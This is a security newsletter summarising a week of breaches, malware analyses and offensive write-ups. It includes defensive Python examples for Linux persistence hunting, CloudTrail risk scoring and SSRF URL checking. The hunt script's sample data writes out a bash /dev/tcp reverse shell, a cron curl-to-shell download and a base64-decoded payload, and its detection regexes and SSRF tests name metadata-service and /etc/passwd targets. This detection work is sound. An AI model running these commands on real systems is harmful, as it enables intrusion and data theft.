Last Week in Security - 2024-08-27
We're Hiring!
Immediate Open Positions:
Maryland Applicants:
We have openings for a Technical Writer, Red Team Operator, Red Team Operator Infrastructure Engineer, Red Team Operator Tool Developer, Systems Engineer, HPC Software Engineer, Information Systems Security Engineer, Cyber Operator Developer Analyst (CODA), Senior Data Analyst and Earned Value Management Specialist.
Virginia Applicants:
Available opportunities: Land and Expeditionary Warfare Specialist, Cyber Warfare Threat Analyst, and Cyber Network Operator.
For more open positions visit: https://www.sixgen.io/careers
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools, and exploits from the past week. This post covers 2024-08-19 to 2024-08-26.
News
National Public Data Published Its Own Passwords - National Public Data (NPD), a background-check data broker, suffered a breach that exposed Americans' personal information, including Social Security Numbers. An NPD sister site then accidentally published its own source code, including the passwords to its back-end database. NPD acknowledged the breach in August 2024, but the intrusion dates back to December 2023, and the stolen data included names, phone numbers, and email addresses. Individuals are advised to freeze their credit files and check their credit reports regularly. Numerous cybercriminal services offer detailed background checks on consumers, powered by data from compromised accounts at data brokers.
Announcing mandatory multi-factor authentication for Azure sign-in - Microsoft will require multi-factor authentication (MFA) for all Azure sign-ins. The rollout is phased: from October 2024 it covers the Azure portal, the Microsoft Entra admin center and the Intune admin center; in early 2025 it extends to Azure CLI, Azure PowerShell, the Azure mobile app and Infrastructure as Code tools. Supported methods include Microsoft Authenticator, FIDO2 security keys, certificate-based authentication and passkeys. Microsoft will send further notifications ahead of each phase and says it aims for a low-friction experience for legitimate customers while enforcing the requirement.
The best hacks and security research from Black Hat and Def Con 2024 - TechCrunch's round-up of the research presented at the Black Hat and Def Con conferences in Las Vegas. Highlights include hacking Ecovacs robot vacuums to spy on their owners, infiltrating the LockBit ransomware operation, using a laser microphone to recover keystrokes from the sound of typing, and tricking Microsoft Copilot with prompt injection. One researcher also kept six companies from being ransomed by finding flaws in the ransomware gangs' own leak sites.
Hardware backdoors found in Chinese key cards - Security researchers discovered a hardware backdoor in RFID key cards built on MIFARE Classic-compatible chips from Shanghai Fudan Microelectronics: a secret authentication key lets anyone with a commodity reader clone an affected card and open the doors it unlocks. The backdoor key was present in both newer and older Fudan card models, and a related key also opens some older cards from other manufacturers, including NXP and Infineon, in a chip family dating back to 1994, so deployments from other vendors are affected as well.
SolarWinds left critical hardcoded credentials in its Web Help Desk product - SolarWinds left hardcoded credentials in its Web Help Desk product, allowing an unauthenticated remote attacker to log in to vulnerable instances and modify sensitive data. A hotfix is available but must be installed manually. The flaw is rated 9.1 out of 10 on the CVSS scale and is most exposed on installations reachable from the public internet. The issue follows earlier SolarWinds security problems, including the supply-chain compromise that let Russian intelligence into its customers' networks.
How the ransomware attack at Change Healthcare went down: A timeline - The ransomware attack on Change Healthcare produced one of the largest breaches of U.S. health and medical data on record. The ALPHV/BlackCat gang carried out the attack, and parent company UnitedHealth paid a ransom of $22 million. The attackers stole sensitive medical data on a "substantial proportion of people in America," and the outage disrupted claims processing and pharmacies across the healthcare sector for weeks. The U.S. government offered a $10 million bounty for information on the gang's leaders; after ALPHV kept the payment for itself, the affiliate who carried out the intrusion took the stolen data to a new group, RansomHub, which demanded a second ransom from UnitedHealth. Change Healthcare began notifying affected individuals in June, and UnitedHealth's CEO told Congress the breach was preventable: the attackers logged in with stolen credentials to a remote-access portal that had no multi-factor authentication.
Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control - The China-linked group Velvet Ant exploited a zero-day command-injection flaw in the NX-OS CLI of Cisco Nexus switches to run code on the switches' underlying Linux system, then deployed custom malware on the devices themselves for persistence and data exfiltration. Network appliances rarely carry endpoint monitoring, which is what makes them attractive as a long-term foothold. The activity is attributed to an espionage campaign against an unnamed organization in East Asia, and Cisco has released security updates.
Local Networks Go Global When Domain Names Collide - The proliferation of new top-level domains has turned an old naming mistake into a security problem: organizations that named their internal Active Directory domains with a TLD that did not exist at the time (such as .ad) now have Windows devices that resolve those names on the public Internet whenever they leave the corporate network, sending authentication traffic, including usernames and password hashes, to whoever registers the matching domain. Security researcher Philippe Caturegli of Seralys has been mapping the exposure by scanning the Internet for self-signed certificates that reference such TLDs. Organizations are encouraged to register the colliding domains or rename their internal namespace before cybercrime groups exploit the traffic.
Halliburton shuts down systems after cyberattack - Oil drilling and fracking giant Halliburton shut down some of its internal systems after a cyberattack. The company became aware of unauthorized access to its systems and responded by proactively taking certain systems offline. There are no indications that the incident is impacting energy services at this time, according to the U.S. Department of Energy. Halliburton declined to comment further on the nature of the security incident and is working to identify any effects of the cyberattack.
Threat Intel and Defense
The gift that keeps on giving: A new opportunistic Log4j campaign - More than two and a half years after disclosure, Log4Shell (CVE-2021-44228) is still being exploited; this campaign uses it to deploy crypto-miners and take over hosts. The attackers obfuscate the JNDI lookup string in their LDAP requests to slip past signature-based detection, then establish persistence, carry out reconnaissance, and exfiltrate data over backdoors and encrypted channels. Log4Shell has been used by state-backed groups and opportunistic criminals alike, so unpatched Log4j 2.x instances, including those embedded in vendor software, remain worth hunting for.
Linux Detection Engineering - A primer on persistence mechanisms - Elastic Security Labs walks through how attackers establish persistence on Linux (cron and other scheduled tasks, systemd services and timers, shell profile edits, SSH authorized_keys changes, bind shells and reverse shells) and how to hunt for each one. It uses the PANIX tool to plant each technique so that detection coverage can be tested, and provides ES|QL aggregation queries and OSQuery queries for hunting each mechanism, giving defenders and researchers a foundation in Linux persistence.
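To turn the primer's checklist into something repeatable, here is an added Python hunt script (not the PANIX tool and not Elastic's queries) that walks the cron, systemd, shell-profile and authorized_keys locations under a root directory and flags lines matching reverse-shell and staging indicators. The indicator list, the location list and the sample filesystem it builds in a temporary directory are all constructed for the example; point `hunt()` at `/` (or a mounted forensic image) to run it for real.

```python
import os
import re
import tempfile

# Indicators checked against each command-bearing line (constructed for this example).
SUSPICIOUS = [
    (re.compile(r'/dev/tcp/'),                        'bash reverse shell via /dev/tcp'),
    (re.compile(r'\b(nc|ncat|netcat)\b.*\s-e\s'),     'netcat -e remote shell'),
    (re.compile(r'\bsocat\b.*\bexec\b', re.I),        'socat exec remote shell'),
    (re.compile(r'base64\s+(-d|--decode)'),           'base64-decoded payload'),
    (re.compile(r'\b(curl|wget)\b.*\|\s*(ba)?sh\b'),  'download piped to a shell'),
    (re.compile(r'python[23]?\s+-c\s.*socket'),       'inline python socket'),
    (re.compile(r'(/tmp|/dev/shm|/var/tmp)/'),        'runs from a world-writable directory'),
]

# System-wide persistence locations, relative to the scanned root.
SYSTEM_PATHS = {
    'cron':    ['etc/crontab', 'etc/cron.d', 'etc/cron.hourly', 'etc/cron.daily',
                'var/spool/cron', 'var/spool/cron/crontabs'],
    'systemd': ['etc/systemd/system'],
    'shell':   ['etc/profile', 'etc/bash.bashrc', 'etc/profile.d', 'root/.bashrc'],
    'ssh':     ['root/.ssh/authorized_keys'],
}
# Per-user locations under home/<user>/.
USER_PATHS = [('shell', '.bashrc'), ('shell', '.profile'), ('shell', '.bash_profile'),
              ('ssh', '.ssh/authorized_keys'), ('systemd', '.config/systemd/user')]
KEY_TYPES = ('ssh-', 'ecdsa-', 'sk-')

def _files(root, rel):
    """Yield the file at root/rel, or every regular file directly inside it."""
    p = os.path.join(root, rel)
    if os.path.isfile(p):
        yield p
    elif os.path.isdir(p):
        for name in sorted(os.listdir(p)):
            f = os.path.join(p, name)
            if os.path.isfile(f):
                yield f

def _candidates(root):
    for cat, rels in SYSTEM_PATHS.items():
        for rel in rels:
            for f in _files(root, rel):
                yield cat, f
    home = os.path.join(root, 'home')
    for user in (sorted(os.listdir(home)) if os.path.isdir(home) else []):
        for cat, rel in USER_PATHS:
            for f in _files(root, os.path.join('home', user, rel)):
                yield cat, f

def hunt(root):
    """Scan persistence locations under root; return a list of finding dicts."""
    findings = []
    for cat, path in _candidates(root):
        with open(path, errors='replace') as fh:
            for lineno, raw in enumerate(fh, 1):
                line = raw.strip()
                if not line or line.startswith('#'):
                    continue
                rel = os.path.relpath(path, root)
                if cat == 'ssh':
                    # Options in front of the key type (command=, environment=, ...) need review.
                    if not line.startswith(KEY_TYPES):
                        findings.append(dict(category=cat, path=rel, line=lineno,
                                             reason='authorized key carries options', text=line))
                    continue
                if cat == 'systemd' and not line.startswith('ExecStart'):
                    continue   # only the command lines of a unit are interesting here
                for rx, reason in SUSPICIOUS:
                    if rx.search(line):
                        findings.append(dict(category=cat, path=rel, line=lineno,
                                             reason=reason, text=line))
                        break
    return findings

# Constructed sample filesystem: benign entries mixed with one example of each technique.
SAMPLE_TREE = {
    'etc/crontab': "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
                   "* * * * * root bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'\n",
    'etc/cron.d/update': "*/5 * * * * root curl -s http://203.0.113.5/a.sh | sh\n",
    'etc/systemd/system/ssh.service': "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    'etc/systemd/system/sysupdate.service': "[Service]\nExecStart=/dev/shm/.x/agent\n"
                                            "[Install]\nWantedBy=multi-user.target\n",
    'home/alice/.bashrc': "export PATH=$PATH:$HOME/bin\necho aGVsbG8= | base64 -d | bash\n",
    'home/alice/.ssh/authorized_keys': 'ssh-ed25519 AAAAC3Nza...constructed alice@laptop\n'
                                       'command="/usr/bin/true" ssh-rsa AAAAB3Nza...constructed attacker\n',
}

def build_sample_tree(root):
    for rel, content in SAMPLE_TREE.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w') as fh:
            fh.write(content)

def demo():
    """Build the sample tree in a temp dir and hunt it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return hunt(root)

if __name__ == '__main__':
    for f in demo():
        print(f"{f['category']:8} {f['path']}:{f['line']}  {f['reason']}  <- {f['text']}")
```

Pattern matching of this kind is a triage aid, not a verdict: diff the results against a known-good baseline of the same host, and treat any authorized key or unit file you cannot account for as a finding even when no indicator fires.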
Be careful what you pwish for – Phishing in PWA applications - ESET researchers describe phishing campaigns that target mobile users with Progressive Web Applications (and, on Android, WebAPKs) instead of conventional apps. Victims are lured via malvertising, SMS and automated voice calls to third-party pages that install a PWA mimicking their bank; because a PWA is installed from the browser, the user never sees the warnings that accompany sideloading an APK from an unknown source. The apps harvest banking credentials, and different threat actors targeted clients of Czech, Hungarian, and Georgian banks. ESET reported the activity to the affected banks and took down multiple phishing domains and command-and-control servers.
Recent Phishing Campaigns Discovered by ANY.RUN Researchers - ANY.RUN researchers describe recent phishing campaigns, including a Tycoon 2FA phish-kit campaign sent from compromised Amazon Simple Email Service (SES) accounts. The campaigns use long chains of redirects across many domains and protocols to evade detection before landing on the credential-harvesting page. Another campaign abuses Freshdesk to host lure pages containing phishing links, and a high-volume campaign hosts PDFs with phishing links on SharePoint.
MoonPeak malware from North Korean actors unveils new details on attacker infrastructure - Cisco Talos has discovered the MoonPeak malware, a remote access trojan being actively developed by a North Korean threat actor group known as UAT-5394. The analysis of the infrastructure used by the threat actor group reveals new details on their tactics, techniques, and procedures. The evolution of MoonPeak from the XenoRAT malware shows the threat actor's continuous development and evolution of their tooling.
Autoencoder Is All You Need: Profiling and Detecting Malicious DNS Traffic - This article describes training an autoencoder on the features of normal DNS traffic so that queries the model reconstructs poorly stand out as anomalous. Detection modules built on these traffic profiles examine suspicious domains from several perspectives, allowing infiltration attempts to be spotted from their DNS footprint. The article includes case studies and details of how the autoencoder-based system flags and blocks malicious DNS requests in real time.
Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset - Proofpoint's Threat Research Team identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation. The attack aimed to deliver the BlackSmith malware toolset, specifically the AnvilEcho PowerShell trojan, for intelligence gathering and exfiltration. TA453 used social engineering techniques to build trust with the target before delivering the malicious payload. AnvilEcho combines multiple malware capabilities into a single PowerShell script, demonstrating TA453's sophisticated intelligence collection toolkit.
Deconstructing Security Monitoring Antipatterns - Antipatterns are common but counterproductive responses to recurring problems. In security monitoring they include relying on network data alone for detection, treating off-the-shelf solutions as sufficient on their own, and prioritizing shiny new tools over basic IT hygiene. The post argues for investing in people, processes, and tools, in that order, and warns against expecting any single tool to provide complete coverage.
Xeon Sender: A SMS Spam Shipping Multi-Tool Targeting SaaS Credentials - Xeon Sender is a Python script used for sending SMS spam through various SaaS providers. It has been repurposed by multiple threat actors and distributed through platforms like Telegram. The tool enables attackers to conduct SMS spam and phishing campaigns using legitimate APIs from service providers.
19th August – Checkpoint Threat Intelligence Report - The Threat Intelligence Report from Check Point Research on August 19, 2024, highlights various cyber attacks and breaches, including the leak of internal communications from Donald Trump's presidential campaign by an Iranian threat actor and a significant financial loss due to a BEC scam at Orion SA. Additionally, there were ransomware attacks on the city of Flint, Michigan, Unicoin, and Evolution Mining, among others. The report also discusses vulnerabilities like Server-Side Template Injection and Microsoft's Patch Tuesday with 90 vulnerabilities, including zero-day vulnerabilities being actively exploited. Check Point Research has also identified new malware called Styx Stealer and reported on cyber attacks following the contested presidential elections in Venezuela.
Enhancing Network Security: Monitoring Client Communication with Velociraptor - This is an overview of using the Velociraptor tool to detect and monitor endpoints for malicious activity.
My Methodology to AWS Detection Engineering (Part 1: Object Selection) - This blog series discusses the author's methodology for threat detection engineering in AWS, focusing on object selection in the first part. The author questions traditional methodologies and advocates for a more nuanced approach that incorporates risk-based alerting concepts and selects critical fields logged by CloudTrail. By assigning numerical values to risk objects and aggregating them, a more comprehensive and effective detection system can be created. The author provides examples and explanations for how this approach can be implemented for identifying potential threats in AWS environments.
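The risk-based aggregation the author describes can be prototyped without a SIEM. The Python below is an added example, not the author's code: it assigns a weight to selected CloudTrail eventName values, adds modifiers for calls from outside known networks and for AccessDenied results, and sums scores per principal over a sliding window so that a sequence of individually unremarkable calls raises one alert. The weights, threshold, corporate IP range and the CloudTrail-shaped events are all constructed assumptions.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed corporate egress ranges; calls from anywhere else earn a bonus.
KNOWN_NETWORKS = [ipaddress.ip_network('10.0.0.0/8')]
# Hypothetical base weights per CloudTrail eventName (the "risk objects");
# tune them to your own environment.
RISK_RULES = {
    'GetCallerIdentity': 10,   # classic first call after a key is stolen
    'ListBuckets': 10,
    'ListUsers': 15,
    'ListAccessKeys': 15,
    'CreateAccessKey': 40,
    'AttachUserPolicy': 40,
    'ConsoleLogin': 5,
}
UNKNOWN_IP_BONUS = 25
ACCESS_DENIED_BONUS = 20   # failed calls look like probing, not business as usual
THRESHOLD = 100
WINDOW = timedelta(hours=1)

def _ts(s):
    return datetime.strptime(s, '%Y-%m-%dT%H:%M:%SZ').replace(tzinfo=timezone.utc)

def score_event(ev):
    """Risk contribution of a single CloudTrail record (0 = not a risk object)."""
    score = RISK_RULES.get(ev.get('eventName'), 0)
    if score == 0:
        return 0
    try:
        ip = ipaddress.ip_address(ev.get('sourceIPAddress', ''))
        if not any(ip in net for net in KNOWN_NETWORKS):
            score += UNKNOWN_IP_BONUS
    except ValueError:
        pass  # AWS-service callers appear as DNS names, not IPs; no bonus
    if ev.get('errorCode') == 'AccessDenied':
        score += ACCESS_DENIED_BONUS
    if ev.get('userIdentity', {}).get('type') == 'Root':
        score *= 2
    return score

def aggregate(events):
    """Sum risk per principal over a sliding window; alert when it crosses THRESHOLD."""
    alerts = []
    history = defaultdict(deque)   # principal ARN -> deque of (time, score, eventName)
    for ev in sorted(events, key=lambda e: e['eventTime']):
        score = score_event(ev)
        if score == 0:
            continue
        t = _ts(ev['eventTime'])
        principal = ev['userIdentity']['arn']
        q = history[principal]
        q.append((t, score, ev['eventName']))
        while q and t - q[0][0] > WINDOW:
            q.popleft()               # drop contributions older than the window
        total = sum(s for _, s, _ in q)
        if total >= THRESHOLD:
            alerts.append({'principal': principal, 'score': total,
                           'events': [name for _, _, name in q]})
            q.clear()                 # one alert per burst
    return alerts

def _ev(time, name, arn, ip, **extra):
    return {'eventTime': time, 'eventName': name, 'sourceIPAddress': ip,
            'userIdentity': {'type': 'IAMUser', 'arn': arn}, **extra}

CI = 'arn:aws:iam::123456789012:user/ci-deploy'
ALICE = 'arn:aws:iam::123456789012:user/alice'

# Constructed sample (not real CloudTrail data): a stale benign call by ci-deploy,
# then a stolen-key reconnaissance burst from an unknown IP, then normal use by alice.
EVENTS = [
    _ev('2024-08-13T09:00:00Z', 'GetCallerIdentity', CI, '10.0.0.5'),
    _ev('2024-08-20T10:00:00Z', 'GetCallerIdentity', CI, '198.51.100.7'),
    _ev('2024-08-20T10:01:10Z', 'ListBuckets', CI, '198.51.100.7'),
    _ev('2024-08-20T10:02:30Z', 'ListUsers', CI, '198.51.100.7', errorCode='AccessDenied'),
    _ev('2024-08-20T10:05:00Z', 'ConsoleLogin', ALICE, '10.0.0.5'),
    _ev('2024-08-20T10:06:00Z', 'ListBuckets', ALICE, '10.0.0.5'),
    _ev('2024-08-20T10:07:00Z', 'DescribeInstances', ALICE, '10.0.0.5'),
]

if __name__ == '__main__':
    for a in aggregate(EVENTS):
        print(a)
```

Keying the aggregation on the principal ARN is the simplest choice; the same loop can be run a second time keyed on sourceIPAddress or access key ID, which catches one attacker rotating through several stolen identities.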
Unmasking Styx Stealer: How a Hacker’s Slip Led to an Intelligence Treasure Trove - Check Point Research (CPR) uncovered Styx Stealer, a new malware capable of stealing browser data, instant messenger sessions, and cryptocurrency. The developer of the malware, Sty1x, made a critical error that leaked sensitive information from his computer, leading to valuable intelligence about the malware and its connections to the Agent Tesla threat actor, Fucosreal. Styx Stealer was derived from Phemedrone Stealer and was offered for sale on the website styxcrypter[.]com. The malware includes features like crypto-clipper, auto-start, clipboard monitor, and additional sandbox evasion techniques.
What a Cluster! How Industry Groups and Names Threat Activity Clusters - The article discusses the practice of clustering threat activities and giving them names to better track, correlate, and describe future cyber threats. This has become more common among security researchers, leading to confusion for those new to cyber threat intelligence. The article defines intrusion clusters as a collection of intrusion activities and explains how they evolve over time. It also covers the process of merging clusters into threat actor groups and provides examples from industry experts. The article concludes with shoutouts to researchers who contributed to validating intrusion cluster names.
Hold Me Closer, TinyPilot - KVM-over-IP devices allow remote access to a keyboard, monitor, and mouse without installing software on the system being controlled. Some of these devices lack authentication and can be vulnerable to attacks if exposed on the internet.
Botnet Fenix - The post analyzes the Fenix botnet malware infection chain, starting from a user downloading a ZIP file from a Dropbox link to the execution of malicious shellcode. The analysis includes deobfuscating JavaScript functions, downloading a .NET executable, and emulating shellcode with a tool called Speakeasy. The malware sets up persistence on the host by changing registry values and periodically requests new tasks from the botnet.
PG_MEM: A Malware Hidden in the Postgres Processes - Aqua Security describes PG_MEM, malware that brute-forces weak PostgreSQL passwords on Internet-exposed databases and then uses the database itself to take over the host: it creates a superuser role, runs shell commands through COPY ... FROM PROGRAM, kills competing miners, drops files for persistence, and deploys a cryptocurrency miner.
PEAKLIGHT: Decoding the Stealthy Memory-Only Malware - Mandiant identified a new memory-only dropper called PEAKLIGHT, which decrypts and executes a PowerShell-based downloader. This downloader delivers malware-as-a-service infostealers and utilizes evasion techniques like system binary proxy execution and content delivery network abuse. PEAKLIGHT downloads payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT, each with unique characteristics.
Understanding the Process Environment Block (PEB) for Malware Analysis - The article discusses the Process Environment Block (PEB) and its importance in malware analysis. It explains how PEB is a structure that holds important data about a process for the Operating System, and how it can be accessed through the Thread Environment Block (TEB). The article discusses key PEB fields that are commonly exploited by malware developers for various purposes such as anti-debugging, API hashing, process hollowing, and UAC bypass. It also provides practical examples and analysis of these techniques, including using PEB for command line manipulation and UAC bypass in BlackMatter Ransomware.
Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware - Unit 42 reports that Bling Libra, the group behind the ShinyHunters brand, has shifted from selling stolen data to extorting the victims directly. In the incident described they used valid AWS credentials that had been exposed in a public repository; the keys had limited permissions, but that was enough to enumerate and pull data from S3 with tools such as S3 Browser and WinSCP. Rotating leaked keys quickly, scanning repositories for secrets, and enabling services such as AWS Security Hub are the recommended countermeasures.
Techniques and Write-ups
Cobalt Strike DNS Listener Setup - This blog post walks through setting up a DNS listener in Cobalt Strike: creating the listener, the advantages and disadvantages of DNS as a C2 channel, and building a VM in Microsoft Azure as a redirector. It covers the DNS configuration in GoDaddy, the Cobalt Strike team server VM in Azure, and testing that the beacon and team server communicate correctly, including how to verify the listener is working and interact with the DNS beacon.
Navigating the Uncharted: A Framework for Attack Path Discovery - The post discusses a framework for discovering attack paths, which are chains of control relationships with at least one violation of the Clean Source Principle. The framework involves mapping security dependencies, weaponizing for control, and identifying Clean Source violations. Attack paths must include at least one clean source violation that can be abused to control dependent resources. The next post will apply this framework to a widely used technology.
SSRFing the Web with the help of Copilot Studio - A critical SSRF vulnerability was discovered in Microsoft's Copilot Studio, allowing researchers access to potentially sensitive information with cross-tenant impact. The vulnerability allowed bypassing SSRF protections to access Microsoft's internal infrastructure, including sensitive data like Instance Metadata Service and Cosmos DB instances. Microsoft responded quickly to address the issue, classifying it as a Critical Information Disclosure problem.
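The bypasses in this kind of bug usually come from a destination check that inspects the URL string rather than the address the fetcher will actually connect to. As an added example, unrelated to Copilot Studio's own code, the Python below classifies the target of an outbound request: it parses the IP-literal spellings attackers use to dodge naive filters, requires every DNS answer to be clean, and rejects link-local, loopback and private ranges. The resolver is injected so the check runs offline; the DNS table and the hostnames in it are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Ranges an outbound fetcher must never reach. 169.254.169.254 (cloud IMDS) sits in
# 169.254.0.0/16; 168.63.129.16 is Azure's platform endpoint and is pinned explicitly.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    '0.0.0.0/8', '10.0.0.0/8', '100.64.0.0/10', '127.0.0.0/8', '169.254.0.0/16',
    '172.16.0.0/12', '192.168.0.0/16', '168.63.129.16/32',
    '::1/128', 'fc00::/7', 'fe80::/10',
)]
_DECIMAL = re.compile(r'^\d+$')
_HEX = re.compile(r'^0x[0-9a-f]+$', re.I)

def literal_ip(host):
    """Parse the IP-literal spellings used to dodge naive filters, or return None.

    Covers dotted quad, bracketed IPv6, bare decimal (2852039166) and hex (0xa9fea9fe);
    IPv4-mapped IPv6 (::ffff:169.254.169.254) is unwrapped in is_blocked().
    """
    h = host.strip('[]')
    try:
        if _DECIMAL.match(h):
            return ipaddress.ip_address(int(h))
        if _HEX.match(h):
            return ipaddress.ip_address(int(h, 16))
        return ipaddress.ip_address(h)
    except ValueError:
        return None

def is_blocked(ip):
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return any(ip in net for net in BLOCKED_NETS)

def check_url(url, resolve):
    """Decide whether a fetcher may request url. Returns (allowed, reason).

    resolve(hostname) -> list of address strings is injected so the check can be
    tested offline; in production pass a real resolver and then CONNECT to the
    addresses you checked (do not resolve again), which defeats DNS rebinding.
    """
    parts = urlsplit(url)
    if parts.scheme not in ('http', 'https'):
        return False, f'scheme {parts.scheme!r} not allowed'
    host = parts.hostname        # userinfo such as 169.254.169.254@ is not the host
    if not host:
        return False, 'no host'
    ip = literal_ip(host)
    addrs = [ip] if ip else [ipaddress.ip_address(a) for a in resolve(host)]
    if not addrs:
        return False, 'host does not resolve'
    for a in addrs:
        if is_blocked(a):        # every answer must be clean, not just the first
            return False, f'{a} is in a blocked range'
    return True, 'ok'

# Constructed resolver table for the example (no network access).
FAKE_DNS = {
    'example.org': ['93.184.216.34'],
    'localhost': ['127.0.0.1'],
    'meta.attacker.test': ['93.184.216.34', '169.254.169.254'],  # mixed answers
}

def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])

if __name__ == '__main__':
    for u in ('https://example.org/api', 'http://169.254.169.254/latest/meta-data/',
              'http://2852039166/', 'http://0xA9FEA9FE/', 'http://[::ffff:169.254.169.254]/',
              'http://168.63.129.16/machine?comp=goalstate', 'https://meta.attacker.test/',
              'http://169.254.169.254@example.org/', 'file:///etc/passwd'):
        print(u, check_url(u, fake_resolve))
```

Two caveats the function cannot cover on its own: HTTP redirects must be disabled or re-checked hop by hop, and the request should be made to the vetted address (with the Host header set from the URL) rather than letting the HTTP client resolve the name a second time.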
Malware development: persistence - part 26. Microsoft Edge - part 1. Simple C example. - This post discusses malware development and persistence techniques, specifically focusing on Microsoft Edge and using registry keys for persistence. The author demonstrates how to replace registry key values in C code and shows the impact on the operating system. The post emphasizes the importance of understanding these techniques for both defensive and offensive cybersecurity purposes. The code examples and screenshots provide a practical educational resource for cybersecurity enthusiasts.
From MLOps to MLOops: Exposing the Attack Surface of Machine Learning Platforms - JFrog's research maps the attack surface of MLOps platforms, distinguishing inherent weaknesses, such as model and dataset formats that execute code when loaded, from implementation flaws in the platforms themselves, such as missing authentication on management APIs, and shows how both can be used to compromise an ML pipeline.
Approach to mainframe penetration testing on z/OS - The article discusses the structure and features of mainframe penetration testing on z/OS operating system, focusing on the approach to pentesting IBM mainframes, potential attack vectors, and privilege escalation methods. It covers topics such as accessing mainframe resources, exploiting configuration errors related to dataset and resource class access control, interacting with mainframe subsystems, and exfiltrating data. The article also mentions the scarcity of specialists in this area, emphasizing the importance of understanding the internal structure of mainframes for successful penetration testing.
Adversary at the Door – Initial Access and what’s currently on the menu - The blog post discusses initial access techniques used by adversaries to gain access to networks, with phishing being the most common vector. Various technologies such as Windows SmartScreen, Authenticode, and Application Allowlisting are mentioned as safeguards against initial access attempts. The post also includes a demonstration of using malicious HTA payloads to gain access and emphasizes the importance of prevention strategies such as robust AV/EDR solutions, patch management, and email filters to mitigate threats.
A Patchdiffing Journey – TP-Link Omada - The blog post describes a patchdiffing journey involving TP-Link Omada routers undertaken after the Pwn2Own 2023 competition. The team discovered a vulnerability in the TP-Link router related to a DHCPv6 client option stack-based buffer overflow, which allowed for remote code execution. By analyzing the vulnerable and patched binaries, they were able to craft a PoC exploit to gain control of the router. The exploit involved sending a payload that triggered the vulnerability and allowed for the execution of arbitrary commands, leading to the successful exploitation of the router.
Teach a Man to Phish: A Decade of Distilled Phishing Wisdom - Forrest Kasler shares a decade of phishing wisdom from the SpecterOps team, giving away all of his secrets for free in a series of posts. The key takeaways include the thrill of phishing, the importance of creativity over canned templates, and the ability to bypass controls. Each post in the series addresses different aspects of phishing, such as targeting, domain reputation, bypassing spam filters, and more. The ultimate goal is to help readers become successful phishers by understanding and overcoming various challenges.
An Introduction to GCPwn – Parts 2 and 3 - Parts 2 and 3 of NetSPI's series on GCPwn, an open-source Python framework for enumerating and exploiting Google Cloud environments, continue the walkthrough of the tool's modules.
RAG chatbot using AI Endpoints and LangChain4J - A tutorial on building a retrieval-augmented generation (RAG) chatbot with OVHcloud's AI Endpoints and LangChain4J: documents are embedded as vectors, the chunks most similar to a question are retrieved and injected into the LLM's context, and the answer is streamed back. The setup involves obtaining an API token, adding the dependencies, and writing the RAGStreamingChatbot class. AI Endpoints give access to hosted large language, NLP and translation models without running the models yourself.
"WireServing" Up Credentials: Escalating Privileges in Azure Kubernetes Services - Mandiant disclosed a privilege escalation vulnerability to Microsoft in Azure Kubernetes Services that allowed attackers to access credentials for services used by the cluster, potentially leading to data theft, financial loss, reputation harm, and other impacts. The vulnerability affected clusters using "Azure CNI" for network configuration and "Azure" for network policy. The attack involved downloading the configuration used to provision the cluster node and extracting TLS bootstrap tokens to read all secrets within the cluster.
Web Browser Stored Credentials - The article discusses how web browsers store credentials using DPAPI encryption and how red teams target these credential storage locations to gain access to other applications. Tools like Mimikatz, SharpDPAPI, and CredentialKatz can be used to decrypt the master keys and retrieve the encrypted keys from browsers like Chrome and Edge. Domain backup keys can also be used to decrypt master keys, allowing access to stored credentials.
A New App Consent Attack: Hidden Consent Grant - Semperis has uncovered a new App Consent Attack called Hidden Consent Grant, where malicious actors can gain access to sensitive resources and data. Their Directory Services Protector can help detect and mitigate this attack.
Technical Analysis: CVE-2024-38021 - Technical analysis was conducted on CVE-2024-38021, a vulnerability found in Microsoft Outlook that could lead to remote code execution. Despite attempts to patch, the NTLM credential leak issue remains unaddressed, requiring organizations to follow security best practices and prioritize regular patching.
How multiple vulnerabilities in Microsoft apps for macOS pave the way to stealing permissions - Cisco Talos has identified eight vulnerabilities in Microsoft applications for macOS, allowing an attacker to inject malicious libraries and gain entitlements and user-granted permissions. These vulnerabilities could potentially lead to sensitive data leakage or privilege escalation. The post also discusses the macOS security model, which includes Transparency, Consent, and Control (TCC) framework, and how attackers can exploit vulnerabilities to steal app permissions. Microsoft considered these issues low risk and declined to fix some of the vulnerabilities.
CVE-2024-7646: Ingress-NGINX Annotation Validation Bypass – A Deep Dive - CVE-2024-7646 is a vulnerability in the popular ingress-nginx controller that allows malicious actors to bypass annotation validation and potentially gain unauthorized access to cluster resources.
Unauthenticated remote code execution on BYOB via arbitrary file write+command injection - A security researcher discovered unauthenticated remote code execution vulnerabilities in the Build Your Own Botnet (BYOB) framework, allowing attackers to take control of the botnet server. The first vulnerability involved arbitrary file write in an exfiltration endpoint, similar to a previously disclosed vulnerability in Empire C2. The second vulnerability was a command injection in the payload generation page, which allowed attackers to inject commands into the system.
Addressed AWS defaults risks: OIDC, Terraform and Anonymous to AdministratorAccess - The article examines how default or example configurations for OIDC federation and Terraform could hand administrative access to anyone on the Internet, for instance a role trust policy that checks the OIDC issuer but not which repository or subject the token belongs to. The author shares the research behind these findings on mass cloud exploitation. AWS has since addressed some of these default risks, and the default Terraform OIDC trust policy example has been improved.
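The checker below is an added Python example (not from the article) that reviews an IAM role trust policy for the GitHub OIDC mistakes described: a federated principal whose Condition pins the audience but not the token subject, a subject pattern that wildcards the organisation/repository part, or an outright anonymous principal. The policies it examines are constructed; the account ID and repository names are placeholders.

```python
import json

GITHUB_ISSUER = 'token.actions.githubusercontent.com'

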